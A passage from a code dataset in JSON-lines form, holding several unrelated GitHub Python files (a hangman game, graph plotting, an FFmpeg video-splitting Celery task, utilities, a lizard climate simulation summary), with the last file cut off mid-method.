decimals=3)))\n\ngrupos = {\n 'a': [4, 31, 72],\n 'b': [14, 35, 42],\n 'c': [17, 43, 51],\n 'd': [5, 33, 67]\n # '0': [1, 33, 75],\n # '1': [30,40,50],\n # '2': [50, 60, 70],\n # '3': [10, 20, 30]\n}\n\nfor k in grupos:\n vals = grupos[k]\n timestamps = []\n Ms = []\n for x in vals:\n tupla = gettimestamp(x)\n timestamps.append(tupla)\n Ms.append((x * (2 * tupla[2] - 1)))\n print(\"{}: med={} prom={} M2/med={} M2/prom={}\".format(timestamps, np.round(np.median(Ms), decimals=3), \n np.round(np.mean(Ms), decimals=3), \n np.round(M2 / np.median(Ms), decimals=3), \n np.round(M2 / np.mean(Ms), decimals=3)))\n","repo_name":"M-Picco/MaterialOrgaDatos","sub_path":"streaming/AMS.py","file_name":"AMS.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19212774699","text":"import random\r\n\r\nlistaPalavras=['pizza','sushi','lanche']\r\nArraypalavraSorteada=[]\r\nArraypalavraSorteadaTamanho=[]\r\npalavraSorteada= random.choice(listaPalavras);\r\nfor i in range(0,len(palavraSorteada)):\r\n ArraypalavraSorteada.append(palavraSorteada[i])\r\n ArraypalavraSorteadaTamanho.append('#')\r\nprint(ArraypalavraSorteada)\r\nfor x in range(0,5):\r\n chute = input('Escolha uma letra:')\r\n for i in range(0,len(palavraSorteada)):\r\n if ArraypalavraSorteada[i]==chute:\r\n ArraypalavraSorteadaTamanho.pop(i)\r\n ArraypalavraSorteadaTamanho.insert(i,chute)\r\n print(ArraypalavraSorteadaTamanho)\r\n continue\r\n continue\r\nif '#' in ArraypalavraSorteadaTamanho:\r\n print('Você perdeu!')\r\n print(ArraypalavraSorteadaTamanho)\r\nelse:\r\n print('Você ganhou!')\r\n print(ArraypalavraSorteada)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LucasMasaoK/ForcaPython","sub_path":"Forca.py","file_name":"Forca.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42906149447","text":"#!/usr/bin/env python3\n\n\n'''\nPlots reference graphs for authors and titles.\n'''\n\n\nimport networkx as nx\nfrom collections import defaultdict\nfrom matplotlib import pyplot as plt\nfrom matplotlib import style\nstyle.use('seaborn')\nimport random\nimport math\n\nimport util\nimport config as 
cfg\n\n\n#maximum number of nodes to plot. will select the most cited nodes\nMAX_N_AUTHOR_NODES = 64\nMAX_N_TITLE_NODES = 48\n#relabel titles/authors to use number instead of the title\nRELABEL_TITLES = False\nRELABEL_AUTHORS = False\n#graph drawing layouts to be tried in preference order\nPREFERRED_LAYOUTS = [\n lambda g: nx.drawing.nx_pydot.graphviz_layout(g, prog='neato'),\n lambda g: nx.drawing.kamada_kawai_layout(g),\n lambda g: nx.drawing.shell_layout(g),\n lambda g: None,\n]\n\n\ndef get_savefig_size(n_nodes):\n size = math.ceil(20*(n_nodes/24)**0.5)\n return (size, size)\n\n\ndef get_nx_graph(graph):\n nx_graph = nx.DiGraph()\n for u, vs in graph.items():\n nx_graph.add_edges_from([(u, v) for v in vs])\n return nx_graph\n\n\ndef get_graph(nx_graph):\n graph = {n: set() for n in nx_graph.nodes()}\n for u, v in nx_graph.edges():\n graph[u].add(v)\n return graph\n\n\ndef filter_graph(graph, nodes):\n nodes = set(nodes)\n graph = {k: v for k, v in graph.items() if k in nodes}\n graph = {k: {v_ for v_ in v if v_ in nodes} for k, v in graph.items()}\n return graph\n\n\ndef get_all_nodes(graph):\n all_nodes = set(graph.keys()) | set(util.flatten(graph.values()))\n return all_nodes\n\n\ndef select_nodes(nodes, hist, max_n_nodes=None):\n nodes = sorted(nodes, key=lambda n: hist.get(n, 0), reverse=True)\n nodes = set(nodes[slice(max_n_nodes)])\n return nodes\n\n\ndef reduce_graph(graph, hist, max_n_nodes=None):\n all_nodes = get_all_nodes(graph)\n nodes = select_nodes(all_nodes, hist, max_n_nodes)\n graph = filter_graph(graph, nodes)\n return graph\n\n\ndef relabel_graph(graph, mapping=None):\n if mapping is None:\n mapping = {k: i for i, k in enumerate(get_all_nodes(graph))}\n graph = {k: {mapping[v_] for v_ in v} for k, v in graph.items()}\n graph = {mapping[k]: v for k, v in graph.items()}\n return graph, mapping\n\n\ndef get_def_dict(dct, typ):\n new_dct = defaultdict(typ)\n for k, v in dct.items():\n new_dct[k] = v\n return new_dct\n\n\ndef relabel_hist(hist, mapping):\n new_hist = {}\n for k, v in mapping.items():\n new_hist[v] = hist.get(k, 0)\n new_hist = get_def_dict(new_hist, int)\n return new_hist\n\n\ndef unit_norm_hist(hist):\n minn = min(hist.values())\n maxx = max(hist.values())\n hist = {k: (v - minn)/(maxx - minn) for k, v in hist.items()}\n hist = get_def_dict(hist, float)\n return hist\n\n\ndef get_node_sizes(nx_graph, hist):\n hist = unit_norm_hist(hist)\n nodes = list(nx_graph.nodes())\n sizes = [int(128 + 4096*hist[n]) for n in nodes]\n return sizes\n\n\ndef get_plot_layout(nx_graph, layouts=PREFERRED_LAYOUTS):\n for fn in layouts:\n try:\n layout = fn(nx_graph)\n return layout\n except Exception as e:\n print('WARNING: could not get layout: \"{}\". 
trying next'.format(e))\n raise\n\n\ndef get_node_colors(nx_graph):\n graph = get_graph(nx_graph)\n hist = {k: len(v) for k, v in graph.items()}\n colors = [hist[n] for n in nx_graph.nodes()]\n return colors\n\n\ndef plot_nx_graph(graph, hist, **kwargs):\n norm_hist = unit_norm_hist(hist)\n fig, ax = plt.subplots()\n nx.draw_networkx(\n graph,\n pos=get_plot_layout(graph),\n ax=ax,\n node_size=get_node_sizes(graph, hist),\n node_color=get_node_colors(graph),\n cmap=plt.cm.YlOrRd,\n edge_color='grey',\n arrowsize=10,\n arrowstyle='->',\n font_color='black',\n **kwargs,\n )\n if kwargs.get('title') is not None:\n ax.set_title(kwargs['title'])\n ax.grid(False)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.tight_layout()\n return fig, ax\n\n\ndef plot_graph(graph, hist, relabel=False, max_n_nodes=None, title=None):\n graph = reduce_graph(graph, hist, max_n_nodes)\n if relabel:\n graph, mapping = relabel_graph(graph)\n hist = relabel_hist(hist, mapping)\n else:\n mapping = None\n nx_graph = get_nx_graph(graph)\n fig, ax = plot_nx_graph(nx_graph, hist,\n title='citation graph (top {} cited nodes)'.format(max_n_nodes))\n return fig, ax, mapping\n\n\ndef plot_titles_graph():\n graph = util.load_graph(cfg.paths['titles-refs-graph'])\n hist = util.load_csv_hist(cfg.paths['titles-refs-hist'])\n fig, ax, mapping = plot_graph(\n graph, hist, relabel=RELABEL_TITLES, max_n_nodes=MAX_N_TITLE_NODES)\n\n fig.set_size_inches(get_savefig_size(MAX_N_TITLE_NODES), forward=False)\n fig.savefig(cfg.paths['titles-graph-plot'], dpi=333)\n print('saved titles graph plot to \"{}\"'.format(\n cfg.paths['titles-graph-plot']))\n if mapping is not None:\n util.save_json(cfg.paths['titles-graph-plot-mapping'], mapping)\n print('saved titles graph plot mapping to \"{}\"'.format(\n cfg.paths['titles-graph-plot-mapping']))\n\n\ndef plot_authors_graph():\n graph = util.load_graph(cfg.paths['authors-refs-graph'])\n hist = get_def_dict(\n util.load_csv_hist(cfg.paths['authors-refs-hist']), int)\n fig, ax, mapping = plot_graph(\n graph, hist, relabel=RELABEL_AUTHORS, max_n_nodes=MAX_N_AUTHOR_NODES)\n\n fig.set_size_inches(get_savefig_size(MAX_N_AUTHOR_NODES), forward=False)\n fig.savefig(cfg.paths['authors-graph-plot'], dpi=333)\n print('saved authors graph plot to \"{}\"'.format(\n cfg.paths['authors-graph-plot']))\n if mapping is not None:\n util.save_json(cfg.paths['authors-graph-plot-mapping'], mapping)\n print('saved authors graph plot mapping to \"{}\"'.format(\n cfg.paths['authors-graph-plot-mapping']))\n\n\ndef plot_graphs():\n plot_titles_graph()\n plot_authors_graph()\n\n\ndef main():\n plot_graphs()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"larocs/attention_dl","sub_path":"plot_graphs.py","file_name":"plot_graphs.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"276194214","text":"import hashlib\nfrom pathlib import Path\n\nfrom celery import shared_task\nfrom celery_progress.backend import ProgressRecorder\nfrom minio.commonconfig import Tags\n\nfrom ffmpeg_transcoder.models import Folder\nfrom ffmpeg import FFmpeg, Progress, FFmpegError\nfrom django.conf import settings\n\n\n@shared_task(bind=True)\ndef split_video(self, input_folder_id, output_folder_id, r_filename: str):\n input_folder = Folder.objects.get(pk=input_folder_id)\n output_folder = Folder.objects.get(pk=output_folder_id)\n input_folder_client = input_folder.bucket.connection.get_client()\n output_folder_client = 
output_folder.bucket.connection.get_client()\n progress_recorder = ProgressRecorder(self)\n progress_recorder.set_progress(0, 100, description=\"Splitting video for file: \" + r_filename)\n # Download file\n hashed_filename = hashlib.md5((r_filename + str(input_folder.id) + \"splitVideo\").encode()).hexdigest() + Path(\n r_filename).suffix\n object_download_path = settings.DOWNLOAD_FOLDER / hashed_filename\n input_folder_client.fget_object(input_folder.bucket.name,\n input_folder.prefix + \"/\" + r_filename, object_download_path)\n\n # Create output folder\n output_folder_path = Path(settings.UPLOAD_FOLDER) / hashed_filename\n output_folder_path.parent.mkdir(parents=True, exist_ok=True)\n\n template = str((output_folder_path / \"%03d\").with_suffix(Path(r_filename).suffix))\n # Split video\n ffmpeg = (\n FFmpeg()\n .option('y')\n .input(str(object_download_path))\n .output(template, {\n 'c': 'copy',\n 'map': '0',\n 'segment_time': '00:10:00',\n 'f': 'segment',\n 'reset_timestamps': '1'\n })\n )\n\n task_id = self.request.id\n\n @ffmpeg.on(\"progress\")\n def on_progress(progress: Progress):\n print(\n f\"Task ID: {task_id} - Frame: {progress.frame} - Fps: {progress.fps}\")\n\n @ffmpeg.on(\"completed\")\n def on_completed():\n print(\"Job Completed !!! 🎉\")\n\n try:\n print(\"Starting transcoding\")\n ffmpeg.execute()\n\n except FFmpegError as e:\n output_folder_path.unlink()\n # Set scheduled tag\n tags = Tags()\n tags[\"scheduled\"] = \"false\"\n input_folder_client.set_object_tags(\n input_folder.bucket.name,\n input_folder.prefix + \"/\" + r_filename,\n tags,\n )\n raise e\n\n # Upload folder\n for file in output_folder_path.glob(\"*\"):\n output_folder_client.fput_object(output_folder.bucket.name, output_folder.prefix + \"/\" + file.name, file)\n # tag file\n tags = Tags()\n tags[\"scheduled\"] = \"false\"\n tags[\"parent\"] = r_filename\n tags[\"type\"] = \"split\"\n output_folder_client.set_object_tags(\n output_folder.bucket.name,\n output_folder.prefix + \"/\" + file.name,\n tags,\n )\n file.unlink()\n\n output_folder_path.rmdir()\n # delete file\n object_download_path.unlink()\n\n # Set scheduled tag\n tags = Tags()\n tags[\"scheduled\"] = \"false\"\n input_folder_client.set_object_tags(\n input_folder.bucket.name,\n input_folder.prefix + \"/\" + r_filename,\n tags,\n )\n print(\"Splitting completed\")\n progress_recorder.set_progress(100, 100, description=\"Splitting completed\")\n\n return f\"Splitting completed for file: {r_filename} 🎉\"\n","repo_name":"Apoorva64/ffmpeg-scheduler","sub_path":"ffmpeg_transcoder/split_video.py","file_name":"split_video.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42195976073","text":"\"\"\"\n1. 
Write a program that receives two numbers and shows which one is larger.\n\n\"\"\"\nnum1 = int(input('Digite o primeiro número: '))\nnum2 = int(input('Digite o segundo número: '))\n\nif num1 > num2:\n print(f'O primeiro número é maior: {num1}')\nelse:\n print(f'O segundo número é maior: {num2}')","repo_name":"pand-oly/curso_python","sub_path":"secao-05/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"36988967135","text":"#!/usr/bin/python3\n#-*- coding:utf8 -*-\n\n\"Utility functions.\"\n\nfrom itertools import product, starmap\nfrom multiprocessing import current_process, cpu_count\nfrom multiprocessing.pool import Pool\n\n\n__all__ = 'randbelow', 'parallel', 'parallel_map', 'parallel_starmap', 'random_sample', 'random_permutation', 'Immutable', 'memoize', 'canonical', 'optimized', 'evaluate', 'substitute', 'valuations'\n\n\nif __debug__:\n\tfrom random import randrange\n\t\n\tdef randbelow(modulus):\n\t\t\"In debug mode, use pseudo-random number generator.\"\n\t\treturn randrange(modulus)\nelse:\n\tfrom secrets import randbelow\n\t\"In release mode, use system entropy source.\"\n\n\ndef canonical(x):\n\treturn x.canonical()\n\n\ndef optimized(x):\n\treturn x.optimized()\n\n\ndef evaluate(x):\n\treturn x.evaluate()\n\n\ndef substitute(x, algebra, subst):\n\t#print(\"substitute\")\n\tif hasattr(x, 'operator'):\n\t\treturn x(**subst)\n\telse:\n\t\treturn algebra.const(x)\n\n\ndef valuations(*variable):\n\tfor valuation in product(*[_v.algebra.base_ring.domain() for _v in variable]):\n\t\tyield dict(zip((str(_v) for _v in variable), valuation))\n\n\ndef memoize(function):\n\tcache = dict()\n\t\n\tdef memoized(*args, **kwargs):\n\t\tkwkey = tuple((_k, kwargs[_k]) for _k in sorted(kwargs.keys()))\n\t\ttry:\n\t\t\treturn cache[args, kwkey]\n\t\texcept KeyError:\n\t\t\tresult = function(*args, **kwargs)\n\t\t\tcache[args, kwkey] = result\n\t\t\treturn result\n\t\n\tmemoized.__name__ = function.__name__\n\treturn memoized\n\n\nparallelism = 0\n\n\nclass parallel:\n\tdef __init__(self, p=cpu_count()):\n\t\tself.new_parallelism = p\n\t\n\tdef __enter__(self):\n\t\tglobal parallelism\n\t\tself.old_parallelism = parallelism\n\t\tparallelism = self.new_parallelism\n\t\treturn self\n\t\n\tdef __exit__(self, *args):\n\t\tglobal parallelism\n\t\tparallelism = self.old_parallelism\n\n\ndef parallel_map(fun, iterable):\n\tif parallelism and not current_process().daemon:\n\t\twith Pool(parallelism) as p:\n\t\t\treturn p.map(fun, iterable)\n\telse:\n\t\treturn map(fun, iterable)\n\n\ndef parallel_starmap(fun, iterable):\n\tif parallelism and not current_process().daemon:\n\t\twith Pool(parallelism) as p:\n\t\t\treturn p.starmap(fun, iterable)\n\telse:\n\t\treturn starmap(fun, iterable)\n\n\ndef random_permutation(length):\n\titems = list(range(length))\n\twhile items:\n\t\tyield items.pop(randbelow(len(items)))\n\n\ndef random_sample(iterable, length, size):\n\t\"\"\"\n\tReturn a random sub-iterable of size `size` from the `iterable` of length `length`.\n\t`size` must not be greater than `length`. It is an error if the `iterable` is shorter than `length`.\n\t\"\"\"\n\t\n\tif not size:\n\t\treturn\n\t\n\ts = 0\n\tfor n in range(size):\n\t\tmean = (length - s) // (size - n)\n\t\tfor m in range(randbelow(mean)):\n\t\t\tnext(iterable)\n\t\t\ts += 1\n\t\tyield next(iterable)\n\t\ts += 1\n\t# FIXME: sometimes ends prematurely\n\n\nclass Immutable:\n\t\"Makes the object immutable.
 You must set `self.immutable = True` after initialization in the constructor.\"\n\t\n\tmutable = frozenset()\n\t\n\t@property\n\tdef immutable(self):\n\t\ttry:\n\t\t\treturn self.__immutable\n\t\texcept AttributeError:\n\t\t\treturn False\n\t\n\t@immutable.setter\n\tdef immutable(self, value):\n\t\tobject.__setattr__(self, '_Immutable__immutable', value)\n\t\n\t#@property\n\t#def mutable(self):\n\t#\ttry:\n\t#\t\treturn self.__mutable\n\t#\texcept AttributeError:\n\t#\t\tmutable = set()\n\t#\t\tobject.__setattr__(self, '_Immutable__mutable', mutable)\n\t#\t\treturn mutable\n\t#\n\t#@mutable.setter\n\t#def mutable(self, value):\n\t#\tobject.__setattr__(self, '_Immutable__mutable', value)\n\t\n\tdef __setattr__(self, attr, value):\n\t\tif self.immutable and (attr not in self.mutable):\n\t\t\traise TypeError(f\"Trying to set attribute `{attr}` on an immutable object. Allowed set of mutable attributes: {' '.join(self.mutable)}\")\n\t\telse:\n\t\t\tobject.__setattr__(self, attr, value)\n\t\n\tdef __delattr__(self, attr):\n\t\tif self.immutable and (attr not in self.mutable):\n\t\t\traise TypeError(\"Immutable object.\")\n\t\telse:\n\t\t\tobject.__delattr__(self, attr)\n\t\n\tdef __hash__(self):\n\t\tif not self.immutable:\n\t\t\traise TypeError(\"Mutable object. ({})\".format(type(self)))\n\t\t# __hash__ must return an int, so fall back to the default identity hash\n\t\treturn object.__hash__(self)\n\n","repo_name":"haael/white-box-fapkc","sub_path":"old/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"47"}
{"seq_id":"74211750862","text":"__author__ = \"Jianguo Jin (jinjianguosky@hotmail.com)\"\n\n# !/usr/bin/python3\n# -*- coding:utf-8 -*- \n# Created by Jianguo on 2017/7/29\n\"\"\"\n Description:\n 4.1.3 Data-driven testing\n To read a CSV file, first import the csv module, read the CSV file with reader(),\nthen iterate over every row of the file with a for loop.\n\nuser_info.csv\ntesting,123455@126.com,23,man\ntesting2,123455@127.com,24,woman\ntesting3,123455@128.com,25,woman\n\n\"\"\"\n\nimport csv\n\ncsv_file = open('user_info.csv', 'r', encoding='utf-8')\ndata = csv.reader(csv_file)\n\nfor line in data:\n print(\"Mail: {}\".format(line[1]))\n","repo_name":"skyaiolos/selenium2_python","sub_path":"chapter4_autoTestingModel/sec4.1.3_DataDrive_CSVFile.py","file_name":"sec4.1.3_DataDrive_CSVFile.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"15116082247","text":"import matplotlib.pyplot as pyplot\nimport json\nimport sys\nimport re\n\nclass SensorPlotable:\n def __init__(self):\n self.values = []\n self.seconds = []\n\n def update(self, seconds: float, values: list):\n self.values.append(values)\n self.seconds.append(seconds)\n \n\nclass SensorPlotableManager:\n def __init__(self, title: str):\n self.sensors = {}\n self.title = title\n \n def update(self, name: str, seconds: float, values: list):\n if name not in self.sensors:\n self.sensors[name] = SensorPlotable()\n self.sensors[name].update(seconds, values)\n\n def plotAll(self):\n figure, axes = pyplot.subplots(nrows = len(self.sensors), squeeze = False, sharex = True)\n \n axes[0, 0].set_title(self.title)\n axes[len(self.sensors)-1, 0].set_xlabel(\"time (ms)\")\n \n for i, (name, plotable) in enumerate(self.sensors.items()):\n axes[i, 0].set_ylabel(name)\n axes[i, 0].plot([i-plotable.seconds[0] for i in plotable.seconds], plotable.values)\n \n figure.tight_layout()\n pyplot.show()\n\n \nmanager = SensorPlotableManager(title = re.sub(\"^.*/\", \"\", sys.argv[1]))\nwith open(sys.argv[1])
 as jsonFile:\n for line in jsonFile:\n sample = json.loads(line)\n manager.update(sample[\"name\"], sample[\"millis\"], sample[\"values\"])\n\nmanager.plotAll()\n","repo_name":"LewisCollum/SensorPort","sub_path":"script/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"73223206542","text":"#imports the tkinter module so we can use it\nfrom tkinter import *\n#Tk() creates the main window\nmaster = Tk()\n\ndef return_entry(en):\n\tcontent = entry.get()\n\tprint(content)\n\t\nLabel(master, text=\"Input: \").grid(row=0, sticky=W)\n\nentry = Entry(master)\nentry.grid(row=0, column=1)\n\nentry.bind('<Return>', return_entry)\n\n#keeps window open\nmainloop()","repo_name":"ethantsang04/Year9Design_EthanTsang","sub_path":"myentry.py","file_name":"myentry.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"24213035558","text":"import os\n\nimport numpy as np\nimport pandas as pd\nimport warnings\nfrom numpy.core._multiarray_umath import ndarray\n\nimport Parameters as p\nfrom Lizard_climbing import Lizard_climbing\nfrom Lizard_climbing_13 import Lizard_climbing_13\nfrom Lizard_energy import Lizard_energy\n\nclass Summary:\n def __init__(self, climate, lizard):\n self.statistics_data = []\n self.climate = climate\n self.lizard = lizard\n\n def calculate_statistics(self):\n\n # id\n id = self.climate.inputfilename[0 : self.climate.inputfilename.index(\"_\")]\n self.statistics_data.append(float(id))\n\n # coordinates\n self.statistics_data.append(self.climate.lat)\n self.statistics_data.append(self.climate.lon)\n\n # past / future\n if \"past\" in self.climate.inputfilename:\n time = 0.0\n elif \"future\" in self.climate.inputfilename:\n time = 1.0\n\n self.statistics_data.append(time)\n\n # climbing?\n if isinstance(self.lizard, Lizard_climbing):\n is_climbing = 1.0\n else:\n is_climbing = 0.0\n\n self.statistics_data.append(is_climbing)\n\n # coordinate temperatures\n self.statistics_data.append(self.climate.mean_ta_year)\n self.statistics_data.append(self.climate.sd_ta_year)\n self.statistics_data.append(self.climate.mean_ta_summer)\n self.statistics_data.append(self.climate.sd_ta_summer)\n self.statistics_data.append(self.climate.mean_ta_winter)\n self.statistics_data.append(self.climate.sd_ta_winter)\n\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n #self.statistics_data.append(310.0)\n\n # total energy\n self.statistics_data.append(sum(self.lizard.energy_gain_per_year) / 20)\n\n # annual growth rate\n self.statistics_data.append(sum(self.lizard.growth_rate_per_year) / 20)\n\n # micro-climate counters\n months = np.array(self.climate.climate_data[p.month,:])\n months_per_day = np.array(self.climate.month_per_day)\n days_per_month = [31,28,31,30,31,30,31,31,30,31,30,31]\n SWDOWNs = np.array(self.climate.climate_data[p.SWDOWN,:])\n mask_daylight = np.array([False])\n mask_daylight = np.concatenate((mask_daylight, (SWDOWNs > 1)[:-1]))\n\n # mean activity hours per day in different months\n activity_ph = np.array(self.lizard.active_per_hour)\n activity_pm = [0] * 12\n\n for month in range(1, 13):\n mask_month_per_hour = (months == month)\n mask_month_per_day = (months_per_day == month)\n\n mean_activity_hours_per_day = 
(sum(activity_ph[mask_month_per_hour]) / 60) / sum(mask_month_per_day)\n activity_pm[month - 1] = mean_activity_hours_per_day * days_per_month[month - 1]\n\n self.statistics_data.append(sum(activity_pm))\n\n # activity\n activity_pd = self.lizard.activity_per_day\n # days with activity\n self.statistics_data.append(sum(activity_pd) / 20)\n\n # first julian day of activity\n activity_pd_a = np.array(activity_pd)\n activity_pd_a = np.reshape(activity_pd_a,(20,365))\n \n first_activity_days = []\n last_activity_days = []\n length_of_activity_season = []\n years_with_no_activity = []\n\n j = 1\n for year in activity_pd_a:\n if np.any(year) == False:\n years_with_no_activity.append(j)\n length_of_activity_season.append(0)\n\n else:\n indices = np.nonzero(year)\n\n first_activity_days.append(indices[0][0] + 1)\n last_activity_days.append(indices[0][-1] + 1)\n season_length = last_activity_days[-1] - first_activity_days[-1]\n length_of_activity_season.append(season_length)\n\n j += 1\n \n years_with_activity = 20 - len(years_with_no_activity)\n\n if years_with_activity != 0:\n self.statistics_data.append(sum(first_activity_days) / years_with_activity)\n self.statistics_data.append(sum(last_activity_days) / years_with_activity)\n self.statistics_data.append(sum(length_of_activity_season) / 20)\n else:\n self.statistics_data.append(None)\n self.statistics_data.append(None)\n self.statistics_data.append(0.0)\n\n # heights\n if isinstance(self.lizard, Lizard_climbing):\n if len(self.lizard.climbing_heights_when_essential) != 0:\n mean_height = np.mean(self.lizard.climbing_heights_when_essential)\n std_height = np.std(self.lizard.climbing_heights_when_essential)\n else:\n mean_height = None\n std_height = None\n \n self.statistics_data.append(mean_height)\n self.statistics_data.append(std_height)\n \n \n if len(self.lizard.climbing_heights_when_essential_open_tree) != 0:\n mean_height_open = np.mean(self.lizard.climbing_heights_when_essential_open_tree)\n else:\n mean_height_open = None\n\n self.statistics_data.append(mean_height_open)\n \n #print(self.lizard.climbing_heights_when_essential_shaded_tree)\n \n if len(self.lizard.climbing_heights_when_essential_shaded_tree) != 0:\n mean_height_shaded = np.mean(self.lizard.climbing_heights_when_essential_shaded_tree)\n else:\n mean_height_shaded = None\n\n self.statistics_data.append(mean_height_shaded)\n\n \n\n # why climbing?\n if sum(self.lizard.essential_climbing_per_hour) != 0:\n to_warm = (sum(self.lizard.climbing_to_warm_per_hour) / sum(self.lizard.essential_climbing_per_hour)) * 100\n to_cool = (sum(self.lizard.climbing_to_cool_per_hour) / sum(self.lizard.essential_climbing_per_hour)) * 100\n mixed = (sum(self.lizard.climbing_mixed) / sum(self.lizard.essential_climbing_per_hour)) * 100\n \n open_tree = (sum(self.lizard.essential_climbing_on_open_tree) / sum(self.lizard.essential_climbing_per_hour)) * 100\n shaded_tree = (sum(self.lizard.essential_climbing_on_shaded_tree) / sum(self.lizard.essential_climbing_per_hour)) * 100\n else:\n to_warm = -1.0\n to_cool = -1.0\n mixed = -1.0\n\n open_tree = -1.0\n shaded_tree = -1.0\n\n self.statistics_data.append(to_warm)\n self.statistics_data.append(to_cool)\n self.statistics_data.append(mixed)\n\n self.statistics_data.append(open_tree)\n self.statistics_data.append(shaded_tree)\n \n # how much essential from all climbing (for open and shaded tree)?\n\n if sum(self.lizard.open_tree_per_hour) != 0:\n prec_of_essential_open_tree = (sum(self.lizard.essential_climbing_on_open_tree) / 
sum(self.lizard.open_tree_per_hour)) * 100\n else:\n prec_of_essential_open_tree = -1.0\n \n if sum(self.lizard.shaded_tree_per_hour) != 0:\n prec_of_essential_shaded_tree = (sum(self.lizard.essential_climbing_on_shaded_tree) / sum(self.lizard.shaded_tree_per_hour)) * 100\n else:\n prec_of_essential_shaded_tree = -1.0\n\n self.statistics_data.append(prec_of_essential_open_tree)\n self.statistics_data.append(prec_of_essential_shaded_tree)\n\n else:\n for i in range(11):\n self.statistics_data.append(None)\n\n self.statistics_data = np.array(self.statistics_data).astype(np.float64)\n\n \n \n ## additional information - about climbing\n\n \"\"\"\n if isinstance(self.lizard, Lizard_climbing):\n\n number_of_rows = 365 * 24\n columns = ['julian_day', 'hour', 'daylight', 'burrow', 'open', 'shade', 'open_tree', 'shaded_tree', 'ess_open_tree', 'ess_shaded_tree']\n big_lst = []\n big_lst.append(columns)\n \n daylight_mat_add = np.array(self.lizard.daylight_per_hour)\n burrow_mat_add = np.array(self.lizard.burrow_per_hour)\n burrow_night_mat_add = np.array(self.lizard.burrow_per_hour_night)\n open_mat_add = np.array(self.lizard.open_per_hour)\n shade_mat_add = np.array(self.lizard.shade_per_hour)\n shade_night_mat_add = np.array(self.lizard.shade_per_hour_night)\n open_tree_mat_add = np.array(self.lizard.open_tree_per_hour)\n shaded_tree_mat_add = np.array(self.lizard.shaded_tree_per_hour)\n ess_open_tree_mat_add = np.array(self.lizard.essential_climbing_on_open_tree)\n ess_shaded_tree_mat_add = np.array(self.lizard.essential_climbing_on_shaded_tree)\n\n #daylight_for_print = pd.DataFrame(np.reshape(daylight_mat_add, (20, 8760)).tolist())\n #daylight_for_print.to_csv(\"daylight.csv\")\n \n\n daylight_mat_add = np.reshape(daylight_mat_add, (20, 365, 24))\n burrow_mat_add = np.reshape(burrow_mat_add, (20, 365, 24))\n burrow_night_mat_add = np.reshape(burrow_night_mat_add, (20, 365, 24))\n open_mat_add = np.reshape(open_mat_add, (20, 365, 24))\n shade_mat_add = np.reshape(shade_mat_add, (20, 365, 24))\n shade_night_mat_add = np.reshape(shade_night_mat_add, (20, 365, 24))\n open_tree_mat_add = np.reshape(open_tree_mat_add, (20, 365, 24))\n shaded_tree_mat_add = np.reshape(shaded_tree_mat_add, (20, 365, 24))\n ess_open_tree_mat_add = np.reshape(ess_open_tree_mat_add, (20, 365, 24))\n ess_shaded_tree_mat_add = np.reshape(ess_shaded_tree_mat_add, (20, 365, 24))\n \n #daylight_means_add = np.all(daylight_mat_add, axis = 0)\n daylight_means_add = np.sum(daylight_mat_add, axis=0) >= 10\n daylight_sums_add = np.sum(daylight_mat_add, axis = 0)\n special_hours = np.logical_and((np.sum(daylight_mat_add, axis = 0) != 0), (np.sum(daylight_mat_add, axis = 0) != 20))\n #daylight_special_hours = (np.sum(daylight_mat_add, axis = 0) != 0) or (np.sum(daylight_mat_add, axis = 0) != 0)\n #print(daylight_special_hours)\n #daylight_for_print = pd.DataFrame(daylight_special_hours.tolist())\n #daylight_for_print.to_csv(\"daylight.csv\")\n \n burrow_means_add = np.mean(burrow_mat_add, axis = 0)\n burrow_night_means_add = np.mean(burrow_night_mat_add, axis=0)\n open_means_add = np.mean(open_mat_add, axis=0)\n shade_means_add = np.mean(shade_mat_add, axis=0)\n shade_night_means_add = np.mean(shade_night_mat_add, axis=0)\n open_tree_means_add = np.mean(open_tree_mat_add, axis=0)\n shaded_tree_means_add = np.mean(shaded_tree_mat_add, axis=0)\n ess_open_tree_means_add = np.mean(ess_open_tree_mat_add, axis=0)\n ess_shaded_tree_means_add = np.mean(ess_shaded_tree_mat_add, axis=0)\n \n #daylight_for_print = 
